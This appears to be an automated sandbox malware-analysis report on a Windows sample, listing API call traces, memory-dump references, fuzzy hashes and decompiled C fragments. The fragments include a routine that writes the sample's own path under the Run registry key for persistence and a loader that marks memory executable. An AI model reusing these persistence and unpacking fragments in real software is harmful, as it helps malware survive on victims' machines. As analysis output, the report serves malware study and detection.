                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,02D14E98,?), ref: 02D13581
                                                                      • Part of subcall function 02D15EB4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,02D13652,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D15EBE
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D135AC
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,745D0770,?,02D15A4F,.bss,00000000), ref: 02D133C8
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,?,02D15A4F,.bss,00000000), ref: 02D133D5
                                                                      • Part of subcall function 02D133BF: lstrcpyA.KERNEL32(00000000,?,?,02D15A4F,.bss,00000000), ref: 02D133E8
                                                                      • Part of subcall function 02D13125: lstrcatA.KERNEL32(00000000,745D0770,?,00000000,?,02D135C4,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D13151
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                                                    • String ID:
                                                                    • API String ID: 346377423-0
                                                                    • Opcode ID: 38dcc1d2bccbcef6844aad7792fba712e01645e0028f723dd87a7f838b9dd428
                                                                    • Instruction ID: 74a42cd7ffb7bb289ee98d6c53863b85cffc5ebed7e13a84e0db4bd750159077
• Opcode Fuzzy Hash: 38dcc1d2bccbcef6844aad7792fba712e01645e0028f723dd87a7f838b9dd428
• Instruction Fuzzy Hash: B20175B1B01220BBDF15BBA4EC85FAE776EDF49750F100465B906AB780CE746E008BB4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
    E02D2106C(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
        long _t10;
        short** _t22;
        void** _t23;

        _t23 = __ecx;
        _t22 = _a8;
        if(_a16 == 0 || E02D1F731(_a4, _t22) != 0) {
            L4:
            _t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
            if(_t10 != 0) {
                goto L6;
            }
            return _t10 + 1;
        } else {
            _a16 = 0;
            if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
                L6:
                return 0;
            }
            E02D20FAE(_t23);
            goto L4;
        }
    }

APIs
• RegOpenKeyExW.KERNEL32(745D0770,00000000,00000000,02D235AB,?,?,?,02D235AB,?,02D2158B,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D210BB
  • Part of subcall function 02D1F731: RegOpenKeyExW.ADVAPI32(745D0770,00000000,00000000,00020019,00000000,745D0770,?,02D21088,?,?,02D235AB,?,02D2158B,80000001,?,000F003F), ref: 02D1F747
• RegCreateKeyExW.ADVAPI32(745D0770,00000000,00000000,00000000,00000000,02D235AB,00000000,?,?,?,?,02D235AB,?,02D2158B,80000001,?), ref: 02D210A0
  • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Open$CloseCreate
• String ID:
• API String ID: 1752019758-0
• Opcode ID: 9f074ab36d17c505c845524ed06b95286cccbb6162304475eae3a4f3a9cde363
• Instruction ID: 6a48252572c47ec3422c4b1b0ef687a1e1325c469c8817c9670707a8039245b6
• Opcode Fuzzy Hash: 9f074ab36d17c505c845524ed06b95286cccbb6162304475eae3a4f3a9cde363
• Instruction Fuzzy Hash: 1D01817120015DBFAB108E51ED80DBF3B6EEF54298B20402AFC0992310E731CD65DAB1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCommandLineA.KERNEL32(004068C0,?), ref: 00406730
• CoInitialize.OLE32(00000000), ref: 00406738
  • Part of subcall function 004053A0: VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040), ref: 0040540A
  • Part of subcall function 004053A0: VirtualProtect.KERNEL32(74707E90,00000100,00000040,?), ref: 0040542E
  • Part of subcall function 004053A0: MessageBoxA.USER32(00000000,00418940,00418940,00000001), ref: 0040548E
  • Part of subcall function 004053A0: MessageBoxA.USER32(00000000,00418940,00418940,00000001), ref: 004054AE
  • Part of subcall function 004053A0: MessageBoxA.USER32(00000000,00418940,00418940,00000002), ref: 004054D0
Memory Dump Source
• Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Message$Virtual$AllocCommandInitializeLineProtect
• String ID:
• API String ID: 4246773361-0
• Opcode ID: 62298a183831b6cad95d734ce1ee692728ccb8486e96571fbe4ca2813af9f72b
• Instruction ID: 760a1576de2ac2a99c9c8e5a98d66efc0fdce46a14bef97c55f5fc842ac0b789
• Opcode Fuzzy Hash: 62298a183831b6cad95d734ce1ee692728ccb8486e96571fbe4ca2813af9f72b
• Instruction Fuzzy Hash: CAA001351449089BD3592BB1AC0E7AD3A61AB29B46FA8847EBA26944A1CEB944018A19
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
    E02D21D0C(signed int _a4) {

        Sleep(1); // executed
        return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
    }

APIs
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: CountSleepTick
• String ID:
• API String ID: 2804873075-0
• Opcode ID: f18b814d472cd28fcc7666d736a8fbc9f5f45c73d054b8300b8b68a2a8176bde
• Instruction ID: 91dbaad1d543491140b9538e3c8cc697fdc7cd8226c0d6c488109084e4343605
• Opcode Fuzzy Hash: f18b814d472cd28fcc7666d736a8fbc9f5f45c73d054b8300b8b68a2a8176bde
• Instruction Fuzzy Hash: B0D0A9307881048BE30D9A09F84A2223F4EE7E0305F04802AB90ED92D0C9A159744840
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
    E02D20283(void** __ecx) {
        int _t2;
        void** _t4;

        _t4 = __ecx;
        ReleaseMutex( *__ecx);
        _t2 = FindCloseChangeNotification( *_t4); // executed
        return _t2;
    }

APIs
• ReleaseMutex.KERNEL32(?,?,02D1FEFD,02D2359A,02D15BEC,02D2359A,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 02D20288
• FindCloseChangeNotification.KERNEL32(?), ref: 02D20290
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: ChangeCloseFindMutexNotificationRelease
• String ID:
• API String ID: 4264517613-0
• Opcode ID: 573d47cd8285ea5c13af76a88aeabd8627d477254ef7af5705da9e8d6d7a7491
• Instruction ID: 660ce66ab00064962444986a3e79ae1ce00e1c392e46fc3f70c3919661c53ebd
• Opcode Fuzzy Hash: 573d47cd8285ea5c13af76a88aeabd8627d477254ef7af5705da9e8d6d7a7491
• Instruction Fuzzy Hash: 00B0923A845020DFEB362F55F80C894BFA5FF28251316586AF981912288BB20C389F80
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
    E02D15EFF(long __ecx) {
        void* _t2;

        _t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
        return _t2;
    }

APIs
• GetProcessHeap.KERNEL32(00000008,?,02D12FA7,02D15A42,?,?,02D203FD,02D15A42,?,?,745D0770,00000000,?,02D15A42,00000000), ref: 02D15F02
• RtlAllocateHeap.NTDLL(00000000,?,02D203FD,02D15A42,?,?,745D0770,00000000,?,02D15A42,00000000), ref: 02D15F09
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: 67e4ab19b74d8eb04e665cdcbb0b1d315ee599ae0da6f00daa72e8e4ad0f3080
• Instruction ID: 7d45fb52930b79e23589a38108155afaebe7dc3f76867f798db282181e9ac1a8
• Opcode Fuzzy Hash: 67e4ab19b74d8eb04e665cdcbb0b1d315ee599ae0da6f00daa72e8e4ad0f3080
• Instruction Fuzzy Hash: 56A01270C80110ABEE5117E0DD0DF05371CA770302F024900B501D1140996008188731
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
    E02D15EEE(void* __ecx) {
        char _t2;

        _t2 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
        return _t2;
    }

APIs
• GetProcessHeap.KERNEL32(00000000,?,02D13044,?,02D15C22,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EF1
• RtlFreeHeap.NTDLL(00000000,?,?,02D236DB), ref: 02D15EF8
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 6f6ae20f11a04956b44ea883020b73e34331aa7df9584ba8281de133d57fe413
• Instruction ID: 46ae47354f53e14ae75d0d5912e6c72fdedc1a13f9fb5107564a3c0d25982035
• Opcode Fuzzy Hash: 6f6ae20f11a04956b44ea883020b73e34331aa7df9584ba8281de133d57fe413
• Instruction Fuzzy Hash: CFA00271D95110ABED9557E09A0DB15372C9765702F114944B506D6240966458548631
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
    E02D11085(long _a4) {
        void* _t3;

        _t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
        return _t3;
    }

APIs
• GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
• RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: 4c0cd8d587832773a9156e0dda64b3a57b4f1dd5c2c6dfeaf31de225bed5552f
• Instruction ID: 3174dfcb3e6e25115ca46834b2d922ab0b61b6a9e024c53fad74c1ad77422e9c
• Opcode Fuzzy Hash: 4c0cd8d587832773a9156e0dda64b3a57b4f1dd5c2c6dfeaf31de225bed5552f
• Instruction Fuzzy Hash: 8DB01231C84210FBDF521BE0DE0CF093B28AB74703F024C00F605D1140C6314824DB22
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
    E02D1309D(char** __ecx, void* __eflags, intOrPtr* _a4) {
        char** _v8;
        short* _t15;
        void* _t19;
        int _t39;

        _push(__ecx);
        _v8 = __ecx;
         *_a4 = 0;
        if(E02D1308C(__ecx) > 0) {
            _t39 = MultiByteToWideChar(0, 2,  *__ecx, E02D1308C(__ecx) + 2, 0, 0) + _t14;
            _t15 = E02D15E22(_t39);
            _t26 = _t15;
            E02D1308C(_v8);
            MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
            _t19 = E02D135E5( &_v8, _t15); // executed
            E02D13437(_a4, _t19); // executed
            E02D15EA5(_v8);
            E02D15EA5(_t26);
        }
        return _a4;
    }

APIs
  • Part of subcall function 02D1308C: lstrlenA.KERNEL32(00000000,02D130B4,745D0770,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770,?,02D1350E,00000000,?,00000000), ref: 02D13093
• MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,745D0770,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770), ref: 02D130CA
  • Part of subcall function 02D15E22: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,02D133E2,?,02D15A4F,.bss,00000000), ref: 02D15E30
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770,?,02D1350E,00000000), ref: 02D130F5
  • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
  • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
  • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
  • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
  • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 4006399363-0
                                                                    • Opcode ID: 4638bdbfdd8d185994bed2a8a9152961c85a0f8616058ec3713d3e0b69e79237
                                                                    • Instruction ID: 27a00d2e220798d6f9bbceb886d557e8523fe589e9f384dd695748f0f7510647
                                                                    • Opcode Fuzzy Hash: 4638bdbfdd8d185994bed2a8a9152961c85a0f8616058ec3713d3e0b69e79237
                                                                    • Instruction Fuzzy Hash: 68017175B00124BBDB15EFA4EC81DDE7BAEDF49350F1005AAB501EB780CA74DE008BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 0040DCE3: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0040DD24
                                                                    • _free.LIBCMT ref: 00411007
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 87e4df671e6ca6de64bab9c8e32b8bdadc3900401eb004a5244595f9560df5a9
                                                                    • Instruction ID: 4aa6a20bbacd2cf77519574be62369d4791a6c3b4af3f17c5a67f8cf68e88ed2
                                                                    • Opcode Fuzzy Hash: 87e4df671e6ca6de64bab9c8e32b8bdadc3900401eb004a5244595f9560df5a9
                                                                    • Instruction Fuzzy Hash: 49014E725003455BE3318F66CC41D9AFBD9FB89370F25062EF184972C0E6746885C778
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0040DD24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 7b1dfb38bbe6a8d495ce9e40e5a244bb4395994149a342a225d366a952b8fbd7
                                                                    • Instruction ID: 5b9fca878553e3a062412a5a590bc346d3413588735a920c2132f9c12b98e610
                                                                    • Opcode Fuzzy Hash: 7b1dfb38bbe6a8d495ce9e40e5a244bb4395994149a342a225d366a952b8fbd7
                                                                    • Instruction Fuzzy Hash: 04F0E031E1512567DB215FE29D01B6F37589F82770B154037AC08B62C0CE3CD80986DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E02D1F481() {
                                                                    				char _v8;
                                                                    				void* __ecx;
                                                                    				WCHAR* _t3;
                                                                    				void* _t5;
                                                                    				signed int* _t10;
                                                                    				long _t15;
                                                                    				signed int* _t16;
                                                                    				intOrPtr* _t21;
                                                                    
                                                                    				_push(_t10);
                                                                    				_t16 = _t10;
                                                                    				_t3 = E02D11085(0x7d0);
                                                                    				 *_t16 =  *_t16 & 0x00000000;
                                                                    				_t19 = _t3;
                                                                    				 *_t21 = 0x3e8;
                                                                    				GetModuleFileNameW(0, _t3, _t15); // hModule 0 = path of the running image; the API trace records nSize 0x7d0
                                                                    				_t5 = E02D135E5( &_v8, _t19); // executed
                                                                    				E02D13437(_t16, _t5); // executed
                                                                    				E02D15EA5(_v8);
                                                                    				E02D11099(_t19);
                                                                    				return _t16;
                                                                    			}

                                                                    0x02d1f484
                                                                    0x02d1f48c
                                                                    0x02d1f48e
                                                                    0x02d1f493
                                                                    0x02d1f496
                                                                    0x02d1f498
                                                                    0x02d1f4a2
                                                                    0x02d1f4ac
                                                                    0x02d1f4b4
                                                                    0x02d1f4bc
                                                                    0x02d1f4c2
                                                                    0x02d1f4cd

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,02D235AB,?,02D21618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 02D1F4A2
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D11099: GetProcessHeap.KERNEL32(00000000,00000000,02D21E18,00000000,00000000,00000000,00000000,.bss,00000000), ref: 02D1109F
                                                                      • Part of subcall function 02D11099: HeapFree.KERNEL32(00000000), ref: 02D110A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcesslstrcpylstrlen$AllocateFileModuleNameVirtual
                                                                    • String ID:
                                                                    • API String ID: 258861418-0
                                                                    • Opcode ID: d84d741bc4197a50ece013e436bfd5cde55d1750b629779f441324a02f1760e5
                                                                    • Instruction ID: 3a161efd668dec00d01e4f5f5d0f9efa74c2ad381571dbb656b8bd2ccac9702f
                                                                    • Opcode Fuzzy Hash: d84d741bc4197a50ece013e436bfd5cde55d1750b629779f441324a02f1760e5
                                                                    • Instruction Fuzzy Hash: A9E06D72A042547BD655B765FC15FAF7BAECFD1322F100069E109A6680EEA59E008AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E02D1F76B(WCHAR** __ecx, void* __edx, void* __eflags) {
                                                                    				char _v524;
                                                                    				WCHAR** _t13;
                                                                    				void* _t14;
                                                                    
                                                                    				_t14 = __edx;
                                                                    				_t13 = __ecx;
                                                                    				E02D11052( &_v524, 0, 0x208);
                                                                    				__imp__SHGetSpecialFolderPathW(0,  &_v524, _t14, 0); // executed; _t14 (edx) = CSIDL of the folder, buffer 0x208 bytes = MAX_PATH WCHARs, fCreate 0
                                                                    				E02D135E5(_t13,  &_v524); // executed
                                                                    				return _t13;
                                                                    			}

                                                                    0x02d1f784
                                                                    0x02d1f786
                                                                    0x02d1f788
                                                                    0x02d1f79c
                                                                    0x02d1f7ab
                                                                    0x02d1f7b5

                                                                    APIs
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 02D1F79C
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$FolderPathSpeciallstrcpy
                                                                    • String ID:
                                                                    • API String ID: 1680175942-0
                                                                    • Opcode ID: 80d5f51eb2a601793c758b4e9606f64216645548f2d35760f499f7caaafa7086
                                                                    • Instruction ID: 4248df44ad107a0be1dbad2d1621124582ad4a6e50aef59fbe4842d2a11f7c1f
